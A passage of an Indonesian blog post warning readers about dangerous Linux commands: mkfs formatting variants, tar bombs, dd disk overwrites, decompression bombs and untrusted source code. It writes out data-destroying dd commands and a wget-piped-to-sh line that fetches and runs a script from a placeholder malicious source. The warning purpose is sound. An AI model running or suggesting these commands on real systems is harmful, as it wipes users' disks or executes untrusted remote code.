9 PERINTAH LINUX
perintah yang sangat berbahaya bagi sistem Linux Anda jika
tidak mengerti tujuan penggunaannya. Apa pun yang ditulis setelah menerapkan
perintah mkfs ini
akan diformat dan diganti dengan sistem file Linux kosong.
Semua perintah yang disebutkan di bawah ini akan
memformat hard drive dan memerlukan izin
hak administrator pada sistem, antara lain:
§ mkfs
§ mkfs.ext3
§ mkfs.bfs
§ mkfs.ext2
§ mkfs.minix
§ mkfs.msdos
§ mkfs.reiserfs
§ mkfs.vfat
Adapun perintah mkfs.cramfs ini akan melakukan hal yang sama seperti di atas,
tetapi perintah ini tidak memerlukan izin hak administrator untuk
mengeksekusinya.
5. Perintah Tar Bomb
Perintah tar ini digunakan untuk menggabungkan beberapa file ke
dalam satu file arsip dalam format .tar. Ini merupakan
file arsip yang meledak menjadi ribuan bahkan jutaan file dengan nama yang
mirip dengan file yang ada ke dalam direktori saat ini, bukan masuk ke
direktori baru ketika mengekstraknya.
Anda dapat menghindarinya dengan membuat
direktori pelindung baru secara teratur setiap kali Anda menerima file .tar dan kemudian memindahkan file .tar yang diterima tersebut ke direktori saat ini
sebelum di ekstrak.
Jika file tar tersebut memang bom tar, maka Anda
dapat menghapus direktori yang baru dibuat untuk menyingkirkannya. Cara lain
untuk menghindari ledakan bom tar adalah melalui opsi perintah -t untuk membuat daftar semua isi dari file tar dan
memberikan gambaran tentang jenis konten yang terdapat dalam file tar tersebut.
6. Perintah dd
Perintah dd digunakan untuk menyalin dan mengkonversi partisi hard
disk. Namun, perintah ini juga dapat berubah menjadi perintah berbahaya jika
Anda menetapkan tujuan yang salah.
Berikut daftar perintah yang terkait:
§ dd
if=/dev/hda of=/dev/hdb
§ dd
if=/dev/hda of=/dev/sdb
§ dd
if=something of=/dev/hda
§ dd
if=something of=/dev/sda
Adapun perintah ini akan mengubah menjadi nol
seluruh hard drive primer: dd
if=/dev/zero of=/dev/had.
7. Kode Script Shell
Seseorang mungkin menipu Anda dengan memberikan sebuah link
ke script shell, di mana link tersebut dapat mendukung sistem untuk
men-download dan menjalankan file tersebut. Script shell itu mungkin saja
berisi beberapa kode berbahaya bagi sistem Linux. Format perintah mungkin
terlihat seperti ini: wget http://some_malicious_source -O- | sh.
8. Malicious Source Code
Mungkin seseorang memberi Anda suatu source code (kode
sumber) dan meminta Anda untuk mengkompilasinya ke sistem. Namun, kode tersebut
mungkin tampak seperti kode biasa, namun pada kenyataannya beberapa kode
berbahaya yang menyamar dalam kode sumber dan dapat menyebabkan kerusakan pada
sistem Anda.
Untuk menghindari serangan semacam ini, Anda
cukup menerima dan mengkompilasi source code dari sumber yang terpercaya.
Selain berasal dari sumber terpercaya, sebaiknya jangan diterima maupun
dikompilasi ke sistem Linux Anda!
9. Dekompresi Bom
Ketika Anda telah menerima file terkompresi dan Anda dimintai
untuk mengekstrak file tersebut yang ukurannya terlihat sangat kecil yang hanya
beberapa kilobyte (Kb). Namun, jangan dianggap sepele bahwa file
kompresi yang berukuran kecil tersebut ternyata berisi data-data yang sangat sangat banyak dan padat.
Setelah file didekompresi, bisa saja kemungkinan
ratusan GB data diekstrak yang dapat mengisi hard drive hingga menurunkan
kinerja sistem Anda. Untuk menghindari situasi ini, selalu ingat untuk menerima
data dari sumber yang dapat dipercaya.
Nah, sekian informasi ini kami sampaikan. Dan
terima kasih atas kunjungan Anda di blog D&G ini, tepatnya di artikel tentang 9 Kode dan Perintah
Linux yang Berbahaya.
Tidak ada komentar:
Posting Komentar